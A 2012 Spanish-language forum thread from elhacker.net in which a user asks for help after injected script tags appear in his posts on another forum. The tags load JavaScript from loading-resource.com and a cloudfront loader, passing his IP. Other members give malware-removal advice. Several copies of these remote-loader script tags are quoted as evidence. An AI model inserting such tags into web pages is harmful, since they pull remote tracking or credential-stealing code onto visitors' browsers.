elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Seguridad (Moderador: r32)
| | |-+  Ayuda Virus en mi pc roba contraseñas ?????
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Ayuda Virus en mi pc roba contraseñas ?????  (Leído 4,471 veces)
yimycol

Desconectado Desconectado

Mensajes: 39


Ver Perfil
Ayuda Virus en mi pc roba contraseñas ?????
« en: 26 Marzo 2012, 22:53 pm »

Hola buenas,el caso es que en un foro de excel que participo cada vez que posteo sale mi ip,me puse en contacto con los administradores de foro y me dicen que tengo un virus en mi pc para robar contraseñas un troyano, en el foro cada vez que posteo sale este ecript

<script type="text/javascript" src="http://loading-resource.com/50.js.php?i=%7BAFB40BCB-D3CD-4DC7-89E8-7443815D4453%7D"></script><script type="text/javascript" src="https://d3pzomt0ul12fo.cloudfront.net/items/loaders/loader_1032.js?aoi=1311798366&pid=1032&zoneid=10368&cid=ES&rid=29&ccid=Fuexxxx&ip=87.219.xxx.xxx"></script>


por otro lado por correo me dicen esto:

Te comento los dos mensajes que tenemos pendientes en este. Puedes comprobar que se trata de un virus en esta página especialista en troyanos http://threatcenter.crdf.fr/?More&ID=45 ... 1292902300 , si buscas dentro de ella veras que aparece la dirección "loading-resource.com" como causante DNS, que es la que se incluye en el script que nos trae de cabeza, dirección que es totalmente ajena a Todoexpertos. La mayoría de antivirus comerciales no detectan estos tipos virus, tendrás que buscar información en foros para saber como borrarlo.

Lamentablemante nosotros no tenemos conocimientos de eliminación de troyanos por lo que no sabemos decirte mucho, no obstante si podemos ayudar en algo más no dudes en contactar.

un saludo.


   


En línea

rassiel

Desconectado Desconectado

Mensajes: 83


Ver Perfil
Re: Ayuda Virus en mi pc roba contraseñas ?????
« Respuesta #1 en: 27 Marzo 2012, 11:39 am »

podria ser una extension maliciosa instalada en tu navegador, revisa las extensiones que tienes instaladas ya que mayormente lo que hacen es inyectar codigo JS en las pags que visitas, sino sale por ahi entra en el registro de windows y revisa cuales son los programas que se inician con el sistema mayormente se suelen ocultar en C:\Windows\system32 aunque depende mucho de la version del troyano, revisa tambien en inicio ->todos los programas->inicio a ver que hay en ese path lo que incluyas ahi se iniciara con el sistema, recuerda que si es un troyano residente en memoria (se ejecuta al iniciar el sistema y se cuela en la RAM y desde ahi sigue infectando y se sigue ejecutando aunque elimines el source en el HD) aunque elimines el source del disco duro se volvera a meter, tienes que entrar en modo a prueba de errores (modo seguro) y eliminar el source del disco duro y listo para ver donde esta metido, miras en el registro en Run y ahi veras el path donde esta, tambien suelen meterse en la raiz de los discos con los atributos +h +s +a para esto tienes que poner en opciones de carpeta mostrar archivos ocultos y desmarcar la casilla ocultar archivos protegidos y del sistema aunque hay algunos que desactivan estas opciones para que no puedas eliminarlos otros lo que hacen es forzar aunque cambies las opciones para que regresen a el valor de ocultar los archivos si es asi t recomiendo ir a base de prompt con el comando attrib podras ver los archivos ocultos y del sistema ya t digo depende mucho del troyano aunque por las caracteristicas que me dices de que inyecta codigo JS debe ser una extensión maligna, hay una que se instala que lo que hace es publicar contenido "erotico" en tu FB que creo que se llama YouTube Fast Extension o algo asi, salu2 espero t haya sido de ayuda


En línea

yimycol

Desconectado Desconectado

Mensajes: 39


Ver Perfil
Re: Ayuda Virus en mi pc roba contraseñas ?????
« Respuesta #2 en: 27 Marzo 2012, 18:55 pm »

segun me dicen por otras fuentes:
se puede identificar al supuesto troyano por su MD5 : a04333fa7fc11688f3068ca8bc56b689


salud2.
En línea

r32
Moderador
***
Desconectado Desconectado

Mensajes: 1.299



Ver Perfil WWW
Re: Ayuda Virus en mi pc roba contraseñas ?????
« Respuesta #3 en: 27 Marzo 2012, 19:58 pm »

Citar
se puede identificar al supuesto troyano por su MD5 : a04333fa7fc11688f3068ca8bc56b689

Puede haber variado su codigo y con ello su MD5, con lo que no serviría de mucho, creo.
Hay varios temas reportados sobre ":http://loading-resource.com/".

Tendrías que analizar tu PC con un antivirus y antispyware.
Tienes alguno instalado?

Saludos.
En línea

yimycol

Desconectado Desconectado

Mensajes: 39


Ver Perfil
Re: Ayuda Virus en mi pc roba contraseñas ?????
« Respuesta #4 en: 27 Marzo 2012, 20:38 pm »

si se me olvido comentar el tema tengo el NOD32 V5 con su actualizador de firmas,el cual le he pasado 2 veces y eliminado todo aquello sospechoso,pero segun estos individuos de la web,me dicen que los antivirus convencionales no sirven para estos troyanos ????? jod.... con lo tranquilo que estaba yo con mi nod32 jajajajaja
por otro lado me dicen que me baje estos malwarebytes,tdsskiller

Bueno comento este otro tema del supuesto troyano que tengo en mi pc,como todo esto no me acaba de convencer mucho,con otro pc portatil que no uso a penas, me he conectado por wifi a otra red o sea otra ip,entro en la web dichosa y me sale de nuevo este escript :

<script type="text/javascript" src="http://loading-resource.com/50.js.php?i=%7BAFB40BCB-D3CD-4DC7-89E8-7443815D4453%7D"></script><script type="text/javascript" src="https://d3pzomt0ul12fo.cloudfront.net/items/loaders/loader_1032.js?aoi=1311798366&pid=1032&zoneid=10368&cid=ES&rid=29&ccid=Fuxxxxxxxxxxx&ip=87.xxxxxxxxxxxx"></script>

<script type="text/javascript" src="http://loading-resource.com/50.js.php?i=%7BAFB40BCB-D3CD-4DC7-89E8-7443815D4453%7D"></script><script type="text/javascript" src="https://d3pzomt0ul12fo.cloudfront.net/items/loaders/loader_1032.js?aoi=1311798366&pid=1032&zoneid=10368&cid=ES&rid=29&ccid=Fuxxxxxxxxxxxx&ip=87.xxxxxxxxxxxx"></script>

<script type="text/javascript" src="http://loading-resource.com/50.js.php?i=%7BAFB40BCB-D3CD-4DC7-89E8-7443815D4453%7D"></script><script type="text/javascript" src="https://d3pzomt0ul12fo.cloudfront.net/items/loaders/loader_1032.js?aoi=1311798366&pid=1032&zoneid=10368&cid=ES&rid=29&ccid=Fuexxxxxxxxxx&ip=87.xxxxxxxxxxx"></script>

<script type="text/javascript" src="http://loading-resource.com/50.js.php?i=%7BAFB40BCB-D3CD-4DC7-89E8-7443815D4453%7D"></script><script type="text/javascript" src="https://d3pzomt0ul12fo.cloudfront.net/items/loaders/loader_1032.js?aoi=1311798366&pid=1032&zoneid=10368&cid=ES&rid=29&ccid=Fuexxxxxxx&ip=87.xxxxxxxxxxx"></script>

<script type="text/javascript" src="http://loading-resource.com/50.js.php?i=%7BAFB40BCB-D3CD-4DC7-89E8-7443815D4453%7D"></script><script type="text/javascript" src="https://d3pzomt0ul12fo.cloudfront.net/items/loaders/loader_1032.js?aoi=1311798366&pid=1032&zoneid=10368&cid=ES&rid=29&ccid=Fuxxxxxxxxxxx&ip=87.xxxxxxxxxxxx"></script>

<script type="text/javascript" src="http://loading-resource.com/50.js.php?i=%7BAFB40BCB-D3CD-4DC7-89E8-7443815D4453%7D"></script><script type="text/javascript" src="https://d3pzomt0ul12fo.cloudfront.net/items/loaders/loader_1032.js?aoi=1311798366&pid=1032&zoneid=10368&cid=ES&rid=29&ccid=Fuxxxxxxxxxxxx&ip=87.xxxxxxxxxxxx"></script>

bueno no se ve la ip jejejejejeje pero es la misma que uso en mi red jejejejejejeje algo no va en este tema, tendria que reflejarse la ip a la red que me estoy conectando y por otro lado tambien tendria el troyano en el portail ????? veo que mi usuario en esta web asocia siempre la misma ip

Mi sospecha recae en la propia web creo yo ???? mira yo tengo una web que tengo un script que desde otra web puedo ver las ip,localidad,pais ect... de los usuarios que entran en mi web

un saludo.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines